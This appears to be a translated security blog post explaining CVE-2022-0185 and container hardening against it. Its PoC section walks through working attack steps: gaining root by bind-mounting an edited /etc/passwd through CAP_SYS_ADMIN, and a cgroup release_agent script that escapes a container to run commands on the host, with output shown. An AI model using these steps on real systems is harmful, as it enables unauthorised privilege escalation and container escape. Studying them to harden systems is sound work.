On January 18, 2022, Linux maintainers and vendors discovered a heap buffer overflow vulnerability in the legacy_parse_param function of the Linux kernel (5.1-rc1+) file system context function with the vulnerability ID number CVE-2022-0185, which is a high-risk vulnerability with a severity rating of is 7.8 .

The vulnerability allows for out-of-bounds writes in kernel memory. Using this vulnerability, an unprivileged attacker could bypass the restrictions of any Linux namespace and elevate its privileges to root. for example, if an attacker infiltrates your container, it could escape from the container and elevate privileges.

This vulnerability was introduced in March 2019 in the Linux kernel 5.1-rc1 version. A patch was released on January 18 to fix this issue, and all Linux users are advised to download and install the latest version of the kernel.

Vulnerability details

The vulnerability is caused by an integer underflow condition found in the legacy_parse_param function of the file system context function (fs/fs_context.c). The file system context function creates superblocks for mounting and remounting file systems, which record a file system’s characteristics, such as block and file size, and any storage blocks.

By sending more than 4095 bytes of input to the legacy_parse_param function, it is possible to bypass the input length detection and cause an out-of-bounds write, triggering the vulnerability. An attacker could use this vulnerability to write malicious code to other parts of memory, causing a system crash, or could execute arbitrary code to elevate privileges.

The input data for the legacy_parse_param function is added via the fsconfig system call to configure the file system creation context (e.g., an ext4 file system superblock).

1
2
// 使用 fsconfig 系统调用添加由 val 指向的以空字符(NULL)结尾的字符串
fsconfig(fd, FSCONFIG_SET_STRING, "\x00", val, 0);

To use the fsconfig system call, a non-privileged user must have at least CAP_SYS_ADMIN privileges in their current namespace. This means that if the user has access to another namespace with these privileges, it is sufficient to exploit this vulnerability.

If the CAP_SYS_ADMIN privilege is not available to a non-privileged user, an attacker could obtain it via the unshare(CLONE_NEWNS|CLONE_NEWUSER) system call. The Unshare system call allows a user to create or clone a namespace or user, thus having the necessary privileges to perform further attacks. This technique is important for the Kubernetes and container worlds that use Linux namespaces to isolate Pods, and an attacker can fully exploit this in a container escape attack, where once successful, the attacker can gain full control over the host OS and all containers running on the system to further attack other machines on the internal network segment, even even deploy malicious containers in a Kubernetes cluster.

The research team that discovered the vulnerability posted code and a proof of concept to exploit it on GitHub on January 25.

PoC

Docker and other container runs use Seccomp profiles by default to prevent processes in the container from using dangerous system calls to protect Linux namespace boundaries.

Seccomp (full name: secure computing mode) was introduced to the Linux kernel in version 2.6.12 (March 8, 2005) to limit the system calls available to processes to four: read, write, _exit, and sigreturn. initially this mode was a whitelist approach, in which the secure mode In addition to the open file descriptor and the four allowed system calls, the kernel uses SIGKILL or SIGSYS to terminate the process if any other system call is attempted.

However, Kubernetes does not use any Seccomp or AppArmor/SELinux profiles by default to restrict system calls to Pods, which makes it dangerous for processes in Pods to freely access dangerous system calls and wait for the opportunity to gain the necessary privileges (such as CAP_SYS_ADMIN) for further attacks.

Let’s start with a Docker example where the unshare command is not available in a standard Docker environment, and Docker’s Seccomp filterblocks the system calls used by this command.

1
2
3
$ docker run --rm -it alpine /bin/sh
/ # unshare
unshare: unshare(0x0): Operation not permitted

Let’s look at the Kubernetes Pod.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
$ kubectl run --rm -it test --image=ubuntu /bin/bash
If you don't see a command prompt, try pressing enter.
root@test:/# lsns | grep user
4026531837 user        3   1 root /bin/bash
root@test:/#
root@test:/# apt update && apt install -y libcap2 libcap-ng-utils
root@test:/# ......
root@test:/# pscap -a
ppid  pid   name        command           capabilities
0     1     root        bash              chown, dac_override, fowner, fsetid, kill, setgid, setuid, setpcap, net_bind_service, net_raw, sys_chroot, mknod, audit_write, setfcap

You can see that the root user in the Pod does not have CAP_SYS_ADMIN capability, but we can get CAP_SYS_ADMIN capability by unshare command.

1
2
3
4
5
6
7
8
root@test:/# unshare -Urm
#
# pscap -a
ppid  pid   name        command           capabilities
0     1     root        bash              chown, dac_override, fowner, fsetid, kill, setgid, setuid, setpcap, net_bind_service, net_raw, sys_chroot, mknod, audit_write, setfcap
1     265   root        sh                full
# lsns | grep user
4026532695 user        3   265 root -sh

So what can you do with CAP_SYS_ADMIN? Here are two examples to show how CAP_SYS_ADMIN can be used to infiltrate a system.

Normal user elevated to root user

The following procedure can be used to elevate a normal user on the host directly to the root user.

First, give python3 the CAP_SYS_ADMIN capability (note that you cannot manipulate soft links, only original files).

1
2
3
4
5
6
7
8
9
$ which python3
/usr/bin/python3

$ ll /usr/bin/python3
lrwxrwxrwx 1 root root 9 Mar 13  2020 /usr/bin/python3 -> python3.8*

$ setcap CAP_SYS_ADMIN+ep /usr/bin/python3.8
$ getcap /usr/bin/python3.8
/usr/bin/python3.8 = cap_sys_admin+ep

Create a normal user.

1
$ useradd test -d /home/test -m

Then switch to the normal user and go to the user home directory.

1
2
$ su test
$ cd ~

Copy /etc/passwd to the current directory and finish changing the root user’s password to " password".

1
2
3
4
5
6
7
8
$ cp /etc/passwd ./
$ openssl passwd -1 -salt abc password
$1$abc$BXBqpb9BZcZhXLgbee.0s/

# 将第一行的 root:x 改为 root:$1$abc$BXBqpb9BZcZhXLgbee.0s/
$ head -2 passwd
root:$1$abc$BXBqpb9BZcZhXLgbee.0s/:0:0:root:/root:/bin/bash
daemon❌1:1:daemon:/usr/sbin:/usr/sbin/nologin

Mount the modified passwd file to /etc/passwd.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
# cat mount-passwd.py
from ctypes import *
libc = CDLL("libc.so.6")
libc.mount.argtypes = (c_char_p, c_char_p, c_char_p, c_ulong, c_char_p)
MS_BIND = 4096
source = b"/home/test/passwd"
target = b"/etc/passwd"
filesystemtype = b"none"
options = b"rw"
mountflags = MS_BIND
libc.mount(source, target, filesystemtype, mountflags, options)
1
$ python3 mount-passwd.py

Finally is the moment to witness the miracle!!! Switch directly to the root user and enter the password “password”.

1
2
3
$ su root
Password:
root@coredns:/home/test#

Amazing, I’ve switched to the root user.

Let’s see if you really got root privileges.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
$ find / -name "*flag*" 2>/dev/null
/sys/kernel/tracing/events/power/pm_qos_update_flags
/sys/kernel/debug/tracing/events/power/pm_qos_update_flags
/sys/kernel/debug/block/vdb/hctx0/flags
/sys/kernel/debug/block/vda/hctx0/flags
/sys/kernel/debug/block/loop7/hctx0/flags
/sys/kernel/debug/block/loop6/hctx0/flags
/sys/kernel/debug/block/loop5/hctx0/flags
/sys/kernel/debug/block/loop4/hctx0/flags
/sys/kernel/debug/block/loop3/hctx0/flags
/sys/kernel/debug/block/loop2/hctx0/flags
/sys/kernel/debug/block/loop1/hctx0/flags
/sys/kernel/debug/block/loop0/hctx0/flags
....

$ cat /sys/kernel/debug/block/vdb/hctx0/flags
alloc_policy=FIFO SHOULD_MERGE

Well, it’s root, that’s right.

Finally, remember to uninstall /etc/passwd.

1
$ umount /etc/passwd

So, System Reboot Engineers, see if the normal users you assign to others have CAP_SYS_ADMIN capability!

View all processes on the host in a container

Let’s look at another container example. The following magic operation allows you to get all the processes running on the host in a container.

We don’t need to use the --privileged argument to run a privileged container, that would be pointless.

1
$ docker run --rm -it --cap-add=SYS_ADMIN --security-opt apparmor=unconfined ubuntu bash

Next, execute the following command in the container. The final effect is to execute the ps aux command on the host and save its output to the /output file in the container.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
# Mounts the RDMA cgroup controller and create a child cgroup
# This technique should work with the majority of cgroup controllers
# If you're following along and get "mount: /tmp/cgrp: special device cgroup does not exist"
# It's because your setup doesn't have the RDMA cgroup controller, try change rdma to memory to fix it
mkdir /tmp/cgrp && mount -t cgroup -o rdma cgroup /tmp/cgrp && mkdir /tmp/cgrp/x
# Finds path of OverlayFS mount for container
# Unless the configuration explicitly exposes the mount point of the host filesystem
# see https://ajxchapman.github.io/containers/2020/11/19/privileged-container-escape.html
host_path=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab`
# Sets release_agent to /path/payload
echo "$host_path/cmd" > /tmp/cgrp/release_agent
# Creates a payload
echo '#!/bin/sh' > /cmd
echo "ps aux > $host_path/output" >> /cmd
chmod a+x /cmd
# Executes the attack by spawning a process that immediately ends inside the "x" child cgroup
# By creating a /bin/sh process and writing its PID to the cgroup.procs file in "x" child cgroup directory
# The script on the host will execute after /bin/sh exits
sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs"
# Reads the output
cat /output

Eventually you can see all the processes running in the host in the container.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
root@0c84f7587629:/# cat /output
USER         PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
root           1  0.0  0.3 172704 13148 ?        Ss    2021 131:32 /sbin/init nopti
root           2  0.0  0.0      0     0 ?        S     2021   0:18 [kthreadd]
root           3  0.0  0.0      0     0 ?        I<    2021   0:00 [rcu_gp]
root           4  0.0  0.0      0     0 ?        I<    2021   0:00 [rcu_par_gp]
root           6  0.0  0.0      0     0 ?        I<    2021   0:00 [kworker/0:0H-kblockd]
root           8  0.0  0.0      0     0 ?        I<    2021   0:00 [mm_percpu_wq]
root           9  0.0  0.0      0     0 ?        S     2021  18:36 [ksoftirqd/0]
root          10  0.0  0.0      0     0 ?        I     2021 262:22 [rcu_sched]
root          11  0.0  0.0      0     0 ?        S     2021   3:06 [migration/0]
root          12  0.0  0.0      0     0 ?        S     2021   0:00 [idle_inject/0]
root          14  0.0  0.0      0     0 ?        S     2021   0:00 [cpuhp/0]
root          15  0.0  0.0      0     0 ?        S     2021   0:00 [cpuhp/1]
......

I will not explain the specific meaning of these commands, interested parties can study it themselves against the comments.

What is certain is that CAP_SYS_ADMIN capability provides more possibilities for attackers, both in the host and in the container, especially in the container environment, and if we cannot upgrade the kernel due to force majeure factors, we should look for other solutions.

Solutions

Container level

Since v1.22, Kubernetes has been able to use SecurityContext to add default Seccomp or AppArmor profiles to resource objects to protect Pods, Deployment, Statefulset, Daemonset, and more. While this feature is currently in Alpha, users can add their own Seccomp or AppArmor profile and define it in SecurityContext.

Example.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
# pod-test.yaml
apiVersion: v1
kind: Pod
metadata:
  name: protected
spec:
  containers:
    - name: protected
      image: ubuntu
      command:
      - sleep
      - infinity
      securityContext:
        seccompProfile:
          type: RuntimeDefault

After creating the Pod, try to use unshare to get CAP_SYS_ADMIN capability.

1
2
3
4
$ kubectl exec -it protected -- bash
root@protected:/#
root@protected:/# unshare -Urm
unshare: unshare failed: Operation not permitted

The output shows that the unshare system call is successfully blocked and the attacker cannot use this capability to attack.

Host level

There is another option to disable the ability of user namespace from the host level, without rebooting the system. For example, in Ubuntu, the following two lines are all you need to do to make it work instantly, and it will take effect after a reboot.

1
2
$ echo "kernel.unprivileged_userns_clone=0" > /etc/sysctl.d/userns.conf
$ sysctl -p /etc/sysctl.d/userns.conf

If you are on a Red Hat system, you can run the following command to achieve the same result.

1
2
$ echo "user.max_user_namespaces=0" > /etc/sysctl.d/userns.conf
$ sysctl -p /etc/sysctl.d/userns.conf

To summarize the recommendations for handling the vulnerability.

  • If your environment can accept patching the kernel and rebooting the system, it is best to patch it, or upgrade the kernel.
  • Reduce the use of privileged containers that have access to CAP_SYS_ADMIN.
  • For unprivileged containers, make sure you have a Seccomp filter to block their calls to unshare to reduce risk. no problem with Docker, Kubernetes requires additional action.
  • In the future, Seccomp profiles can be enabled for all workloads in a Kubernetes cluster. This feature is currently in Alpha and needs to be enabled via a feature gate.
  • The ability to disable user namespace for users at the host level.

Lastly

Container environments are complex, especially distributed scheduling platforms like Kubernetes, each of which has its own lifecycle and attack surface that can easily expose security risks, and container cluster administrators must pay attention to every detail of security issues. Overall, the security of containers in the vast majority of cases depends on the security of the Linux kernel, so we need to keep an eye on any security issues and implement corresponding solutions as soon as possible.

References